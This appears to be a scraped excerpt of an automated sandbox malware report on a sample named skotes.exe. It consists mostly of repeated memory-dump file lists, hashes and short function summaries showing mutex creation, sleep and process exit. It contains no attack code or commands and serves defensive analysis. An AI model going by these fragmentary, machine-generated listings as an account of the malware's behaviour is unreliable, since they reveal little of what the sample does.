Associated: 00000000.00000002.2092894714.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2093908725.00000000003E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094519949.00000000003EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094722825.00000000003F7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094836418.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094884503.0000000000552000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000568000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094958668.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094973607.00000000005A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094990365.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095079944.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095109781.00000000005CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095128284.00000000005CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096016106.00000000005CF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096084392.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096106562.00000000005E0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096124159.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096139771.00000000005E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096154848.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096173100.00000000005F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096191268.00000000005F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096207526.00000000005FC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096223695.0000000000601000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096241440.0000000000609000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096256386.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096271077.000000000060B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096349740.000000000067F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096365417.0000000000680000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096384051.0000000000689000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096402815.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096421814.0000000000697000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_file.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 1b1bec83156034774804c836c7feea9474f6c6b5cb9b844b8a9533d434db8ba1
Instruction ID: a8657010d78291a405caac8a1151eea389a05116a40798e13c13a30e5ff41a1c
Opcode Fuzzy Hash: 1b1bec83156034774804c836c7feea9474f6c6b5cb9b844b8a9533d434db8ba1
Instruction Fuzzy Hash: 73214171E11119AFDF02EFA4DD819BEB7B9EF08710F111429F901BB2A1DB30AD019BA0

Function 003BF35F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 003BF3A3

Strings

`'>, xrefs: 003BF375
8">, xrefs: 003BF44B

Memory Dump Source

Source File: 00000000.00000002.2092894714.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.2092785153.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2092894714.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2093908725.00000000003E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094519949.00000000003EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094722825.00000000003F7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094836418.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094884503.0000000000552000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000568000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094958668.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094973607.00000000005A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094990365.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095079944.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095109781.00000000005CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095128284.00000000005CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096016106.00000000005CF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096084392.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096106562.00000000005E0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096124159.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096139771.00000000005E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096154848.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096173100.00000000005F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096191268.00000000005F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096207526.00000000005FC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096223695.0000000000601000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096241440.0000000000609000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096256386.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096271077.000000000060B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096349740.000000000067F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096365417.0000000000680000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096384051.0000000000689000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096402815.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096421814.0000000000697000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_file.jbxd

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: 8">$`'>
API String ID: 3903695350-783731222
Opcode ID: 5a24258470e9c4eb4089c9f5706f87e9b309a30c465a8be8a420bcdd3a81514e
Instruction ID: 71c0b1e14ea34ff3c6056333b4b3a58c96b70400d0c33c731ab8da4ae02284a1
Opcode Fuzzy Hash: 5a24258470e9c4eb4089c9f5706f87e9b309a30c465a8be8a420bcdd3a81514e
Instruction Fuzzy Hash: 67316D31600A05DFEB22AA3ADC55BDBB3E8EF00359F155429E249DB995DF71AC80CB21

Analysis Process: skotes.exePID: 6592, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	610
Total number of Limit Nodes:	4

Executed Functions

Function 002B652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,002B652A,?,?,?,?,?,002B7661), ref: 002B6567

Memory Dump Source

Source File: 00000002.00000002.2117074619.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000002.00000002.2117054149.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117074619.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117142714.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117161354.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117180396.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117275274.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117288750.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117304465.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117304465.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117338736.00000000004A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117362180.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117380082.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117399127.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117421062.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117438250.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117455069.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117473000.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117491406.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117514422.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117534358.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117553280.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117571687.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117591079.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117608575.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117628670.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117648246.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117668026.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117686177.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117705127.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117705127.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117764474.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117782742.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117801225.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117821652.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117841158.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 7f54b8b5ea0e2490e4f82c1629d15ef5f48c7cd225610bfee0862c686abf442d
Instruction ID: e50c55c96de12f7ff99e2cd56f33bbb1e8c4544d1e613ba16c611b74d18a6837
Opcode Fuzzy Hash: 7f54b8b5ea0e2490e4f82c1629d15ef5f48c7cd225610bfee0862c686abf442d
Instruction Fuzzy Hash: E7E08C30022108AEDE36BF18C94DA893B69EB1178AF410800F80946222CB39EDA2CA80

Function 00289BA5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0028A963
CreateMutexA.KERNELBASE(00000000,00000000,002E3254), ref: 0028A981

Strings

T2., xrefs: 0028A970

Memory Dump Source

Source File: 00000002.00000002.2117074619.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000002.00000002.2117054149.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117074619.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117142714.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117161354.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117180396.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117275274.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117288750.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117304465.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117304465.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117338736.00000000004A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117362180.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117380082.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117399127.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117421062.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117438250.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117455069.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117473000.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117491406.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117514422.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117534358.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117553280.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117571687.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117591079.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117608575.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117628670.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117648246.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117668026.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117686177.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117705127.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117705127.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117764474.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117782742.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117801225.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117821652.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117841158.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2.
API String ID: 1464230837-2773616320
Opcode ID: d4a8da28def20886260d354dd766acfd0f95aed266352f925b7fcb76a8ba2fe5
Instruction ID: 179b041e206e5affff51967feace6e4b92a5d01134de7441724c2cd3f91da4a7
Opcode Fuzzy Hash: d4a8da28def20886260d354dd766acfd0f95aed266352f925b7fcb76a8ba2fe5
Instruction Fuzzy Hash: 7731AD31A252008BFB08FB78EDC9B6DB7A6DBC5314F288219F004973D5C77659E08751

Function 00289F44 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0028A963
CreateMutexA.KERNELBASE(00000000,00000000,002E3254), ref: 0028A981

Strings

T2., xrefs: 0028A970

Memory Dump Source

Source File: 00000002.00000002.2117074619.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000002.00000002.2117054149.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117074619.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117142714.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117161354.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117180396.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117275274.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117288750.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117304465.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117304465.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117338736.00000000004A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117362180.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117380082.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117399127.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117421062.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117438250.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117455069.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117473000.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117491406.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117514422.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117534358.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117553280.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117571687.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117591079.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117608575.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117628670.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117648246.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117668026.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117686177.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117705127.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117705127.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117764474.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117782742.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117801225.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117821652.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117841158.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2.
API String ID: 1464230837-2773616320
Opcode ID: 792e84a1e57d3d97ee55b0ea8c9e469d482769a3e61cc80ea332760f82fe045a
Instruction ID: 4f1c98ba7c449befb9f540659ef6cbca00aa323f86fd1dc9d366a9bb553774d9
Opcode Fuzzy Hash: 792e84a1e57d3d97ee55b0ea8c9e469d482769a3e61cc80ea332760f82fe045a
Instruction Fuzzy Hash: 15317B31A252009BFB18EB78ED897ACB766EB85310F248219F414D77D5DB3559A08712

Function 0028A079 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0028A963
CreateMutexA.KERNELBASE(00000000,00000000,002E3254), ref: 0028A981

Strings

T2., xrefs: 0028A970

Memory Dump Source

Source File: 00000002.00000002.2117074619.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000002.00000002.2117054149.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117074619.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117142714.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117161354.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117180396.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117275274.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117288750.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117304465.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117304465.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117338736.00000000004A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117362180.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117380082.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117399127.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117421062.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117438250.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117455069.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117473000.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117491406.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117514422.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117534358.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117553280.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117571687.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117591079.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117608575.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117628670.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117648246.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117668026.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117686177.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117705127.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117705127.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117764474.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117782742.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117801225.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117821652.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117841158.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2.
API String ID: 1464230837-2773616320
Opcode ID: 44d6c633d6e250d6d952fbbf2e531feb5e6b06e888ad05948f93f0d26dc6d814
Instruction ID: 9316a05226a348954ad92325790ba24bbbd5eef6182d0cd11cebba599a331a28
Opcode Fuzzy Hash: 44d6c633d6e250d6d952fbbf2e531feb5e6b06e888ad05948f93f0d26dc6d814
Instruction Fuzzy Hash: 44317931B352049BFB08EBB8DDC9B6DB776DB81310F24821AE418973D5DB3699A08712

Function 0028A1AE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0028A963
CreateMutexA.KERNELBASE(00000000,00000000,002E3254), ref: 0028A981

Strings

T2., xrefs: 0028A970

Memory Dump Source

Source File: 00000002.00000002.2117074619.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000002.00000002.2117054149.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117074619.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117142714.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117161354.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117180396.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117275274.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117288750.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117304465.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117304465.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117338736.00000000004A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117362180.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117380082.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117399127.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117421062.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117438250.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117455069.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117473000.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117491406.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117514422.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117534358.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117553280.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
